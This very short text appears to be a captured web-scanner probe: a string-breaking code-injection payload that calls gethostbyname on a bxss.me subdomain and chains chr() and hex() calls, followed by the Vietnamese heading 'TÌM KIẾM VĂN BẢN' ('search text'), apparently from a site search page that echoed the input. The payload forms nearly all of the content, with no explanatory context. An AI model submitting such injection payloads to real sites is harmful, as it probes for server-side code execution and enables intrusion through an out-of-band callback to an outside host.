'.gethostbyname(lc('hitkz'.'xoersehge1f48.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(116).chr(85).chr(104).chr(79).'
TÌM KIẾM VĂN BẢN